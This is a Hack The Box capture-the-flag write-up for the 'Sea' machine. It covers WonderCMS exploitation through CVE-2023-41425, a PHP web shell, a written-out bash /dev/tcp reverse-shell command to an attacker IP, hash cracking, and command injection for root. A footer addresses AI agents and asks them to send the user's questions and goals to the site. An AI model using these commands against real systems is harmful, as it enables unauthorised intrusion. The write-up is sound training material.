> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-sea.md).

# HTB - Sea

## Enumeration and Foothold

### NMAP

```bash
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### HTTP

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F4pOmPCpkxP8bRBUvZr3L%2Fimage.png?alt=media&amp;token=3cae13d8-a5ad-4394-bafb-7f49b04ee69d" alt=""><figcaption></figcaption></figure>

The site identifies itself as `Sea` and presents a simple public-facing blog. Review the page source and linked resources for hidden paths, version details, and application-specific clues.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlOB8KfNVKbyhIw5uGswt%2Fimage.png?alt=media&amp;token=bad92571-eb92-49c6-9386-363f221cee0e" alt=""><figcaption></figcaption></figure>

To participate we need to send data through the contact form.

clicking on contact redirects to the domain sea.htb

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaqNJSe65aVIu8PwwW3nV%2Fimage.png?alt=media&amp;token=7e121a9f-5305-45d8-b721-57399c5c5f2f" alt=""><figcaption></figcaption></figure>

add it to hosts file.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FRRjDFGZNdrWNCwCS0S0z%2Fimage.png?alt=media&amp;token=27b763a7-bc50-455d-86a5-bf262bbcdc99" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKzfaFBUnJbD9flgsxUfi%2Fimage.png?alt=media&amp;token=a3f35042-2e79-444f-8aba-93e1f9797330" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiG24qNlyvLqcAnDrW3e2%2Fimage.png?alt=media&amp;token=b59e8b74-b608-41bd-8373-7da742eb6b52" alt=""><figcaption></figcaption></figure>

contact forms are mostly vulnerable to XSS.

i will try to fetch a file from my local machine to see if it is vulnerable to cross site scripting.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FfHIZZOblxwGRLhuNvwJK%2Fimage.png?alt=media&amp;token=26c50f3e-0b3a-40ed-89dd-93f764541fdd" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FkMKrVPUZsxcBCGQPDgCB%2Fimage.png?alt=media&amp;token=52110c85-116c-4c87-bed6-d7a2ee58d360" alt=""><figcaption></figcaption></figure>

that said i write to get the cookie of the one reviewing my request form.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCeisJ6AeVZT1NM2rnpSg%2Fimage.png?alt=media&amp;token=1e78812e-7600-4648-9e51-44cd47e7dddf" alt=""><figcaption></figcaption></figure>

trying to steal the cookie does not result any request.

probably come back here again.

That said i will run ferox buster to enumerate hidden directories.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOPAkyALFy0sAZu5cqh6p%2Fimage.png?alt=media&amp;token=af723890-7dac-4e85-82e9-5bdfd4f6c348" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlR8E8wwFK9VPEsfSS4cV%2Fimage.png?alt=media&amp;token=a9dfcfb6-40cf-4e97-840b-b3c0694b1eef" alt=""><figcaption></figcaption></figure>

The themes/bike/version leaks a version - 3.2.0

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fn2s6ybGj2pMzFuVwTT9d%2Fimage.png?alt=media&amp;token=7110f285-ed0b-4c4d-99ef-be2a3d88b474" alt=""><figcaption></figcaption></figure>

summary talks about a animated bike theme.

a quick google search reveals that its related to WonderCMS

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FNJ6Hgs1IUq1YJDO6oH2m%2Fimage.png?alt=media&amp;token=e1a884ab-4b87-401e-9c21-875cfe71b43b" alt=""><figcaption></figcaption></figure>

probably the version identified it related to the wonder cms

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FGXQMrPS7de8ZwdAMr7UB%2Fimage.png?alt=media&amp;token=f7e7c831-5875-45f7-90e4-6f31b78d3200" alt=""><figcaption></figcaption></figure>

a quick google search reveals a cross site scripting vulnerability leading to RCE.

{% embed url="<https://shivamaharjan.medium.com/the-why-and-how-of-cve-2023-41425-wondercms-vulnerability-7ebffbff37d2>" %}

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaVBhkO5UgaRe8wqErtb7%2Fimage.png?alt=media&amp;token=05a57911-acfe-4049-b9f2-2ce0fc114381" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/xpltive/CVE-2023-41425/blob/master/exploit.py>" %}

Found the above poc.

What we are doing here is triggering a authenticated user in  uploading a archived php web shell and accessing it to RCE.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FvzpTTFuhzGDechGrxVvO%2Fimage.png?alt=media&amp;token=b869ee11-62a5-49ce-9b83-ed9152cad691" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FwzaycjRUcnSGPQNn1D5M%2Fimage.png?alt=media&amp;token=5e7e4138-42cc-4d75-8bab-e6e373fc2a2b" alt=""><figcaption></figcaption></figure>

after 30 seconds got hit on the server

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FeDigZtntonWkLtJuO1Ll%2Fimage.png?alt=media&amp;token=c24ff50e-a35e-4982-bdf2-bc46b894638d" alt=""><figcaption></figcaption></figure>

that said i can access the web shell to see if it worked.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUH5m3DWZYfu6fxvub7Tq%2Fimage.png?alt=media&amp;token=f7ad08c1-0d98-43e3-a1bd-d8915eed6e82" alt=""><figcaption></figcaption></figure>

and it worked that said  i will get a reverse shell.

```bash
┌──(ajay㉿kali)-[~/Downloads]
└─$ curl -s 'http://sea.htb/themes/malicious/malicious.php' --get --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/10.10.14.49/4444 0>&1'"
```

## Shell as WWW-DATA

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaB1A9V1yayRs9CGxT44i%2Fimage.png?alt=media&amp;token=770961c2-0bc8-4c32-b855-67e84ecd22ca" alt=""><figcaption></figcaption></figure>

```bash
www-data@sea:/var/www/sea/themes/malicious$ python3 -c 'import pty; pty.spawn("/bin/bash")'
<us$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@sea:/var/www/sea/themes/malicious$ export TERM=xterm
export TERM=xterm
www-data@sea:/var/www/sea/themes/malicious$ 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTSp5bBmuURXXywO5ipbq%2Fimage.png?alt=media&amp;token=a0c22c95-a9e5-4e47-8b67-94420e58a2de" alt=""><figcaption></figcaption></figure>

`user.txt` is only readable by amay. there is an .ssh directory but we dont have permissions to view\.it

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FM68Myfsk20tKxXXy0BNp%2Fimage.png?alt=media&amp;token=e2796dc2-2877-4d6e-bf1e-268ca02f9c66" alt=""><figcaption></figcaption></figure>

The is a password hash in the database file lets try to crack it.

before saving the hashes we need to remove backslashes.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1igzTq4JR3KqiB1ve766%2Fimage.png?alt=media&amp;token=b2be4bc8-1766-4b32-9209-a1e3164ee511" alt=""><figcaption></figcaption></figure>

That i can try this password against the two users on the box.

## Shell as Amay

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FS12WaFTNw7alQSFENBR0%2Fimage.png?alt=media&amp;token=75d15788-9f24-4132-b9fc-51d3e3f26ed4" alt=""><figcaption></figcaption></figure>

The password worked against the user amay.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FWIvMz5v4RnDJfbIwbVIm%2Fimage.png?alt=media&amp;token=22f8406c-97fe-498f-8278-ff3b88199773" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiprHKeu6ntP5WwwIgBv6%2Fimage.png?alt=media&amp;token=a8011083-d354-423e-a153-559e3ee58258" alt=""><figcaption></figcaption></figure>

there are some internal services running.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1WptenZbFiYzdsc04ALM%2Fimage.png?alt=media&amp;token=01a453ce-4a49-44b4-adcc-b0ec4aa5dcb0" alt=""><figcaption></figcaption></figure>

port 8080 requires authentication that said i will port forward the port and access it  from my machine.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FEDcWTuJU2pyn2BZfqxq2%2Fimage.png?alt=media&amp;token=e5e874f6-dfd5-49fa-b2e5-3cae6d74f750" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fq2Mm4em3YTIILd85ohYh%2Fimage.png?alt=media&amp;token=7037e9a9-ad80-477a-aec1-20084af7ee07" alt=""><figcaption></figcaption></figure>

trying amay creds gives access.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FBHLV9UcHM7bSfAqCllRK%2Fimage.png?alt=media&amp;token=04ea322a-1ad5-472d-865a-2ba3b67f142f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiDpkQiiIe97kow5kFOEn%2Fimage.png?alt=media&amp;token=00498e0e-b85d-4c74-92a9-c28bc78ad74f" alt=""><figcaption></figcaption></figure>

we can see the contents of the log files by analyse option

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fekt84PAjDmcAupR4Z7oU%2Fimage.png?alt=media&amp;token=144522a9-c9c5-4139-8a2d-ac135b4daeaf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOiQjNlZT1B1YFKdLibLs%2Fimage.png?alt=media&amp;token=b6d44346-47fd-4670-909b-d3d001ca0c89" alt=""><figcaption></figcaption></figure>

access log says username and password validated for root

that said i can use burpsuite to investigate further

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaAc1Dy2VZjBoP8mDAOOo%2Fimage.png?alt=media&amp;token=1a85a56c-d7d1-41bb-8c9a-99cdb4045828" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fo3Yr2EduaS4AhNN87FFO%2Fimage.png?alt=media&amp;token=6867abaa-d1dd-4aef-84f4-436c2ddec712" alt=""><figcaption></figcaption></figure>

changing the log file to display `/etc/passwd` displayed the output so the log file parameter is able to take what ever i provide.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FljE5zG2WOwLqwytix0qb%2Fimage.png?alt=media&amp;token=f9334782-2d59-4ca1-a2e0-e72fed632d37" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjsSwK0qFaaKhSSetC6Mx%2Fimage.png?alt=media&amp;token=f8a8a426-71c4-4acb-8207-3c9f741aa55f" alt=""><figcaption></figcaption></figure>

command injection works by adding a comment character (#)

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FsHM9S4XKL2vs5gb2l0DB%2Fimage.png?alt=media&amp;token=64e2c737-93a0-4524-b728-69453c6c0316" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1OnmCa6NBqGBzZmlsJMo%2Fimage.png?alt=media&amp;token=8eca527e-6122-4929-9c9e-a9c2a998c382" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fl7qwrHhbSof068Fl5xEP%2Fimage.png?alt=media&amp;token=6ebd7fc1-e878-4635-b93e-cbd63ee106bd" alt=""><figcaption></figcaption></figure>

authorised keys are empty

that said i will try to get reverse shell

## Shell as Root

i will use a python reverse shell to get RCE.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FKiKc5kZXaMPzsxh68sV8%2Fimage.png?alt=media&amp;token=10cf522e-48cc-41a0-a743-47647fc01923" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FDodaUQw4znNVH2BFMODP%2Fimage.png?alt=media&amp;token=fa7d7362-36d5-49d2-82f8-91f5789b19c8" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hack-the-box-oscp-machines/htb-sea.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `build a script that syncs our docs to a CMS` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
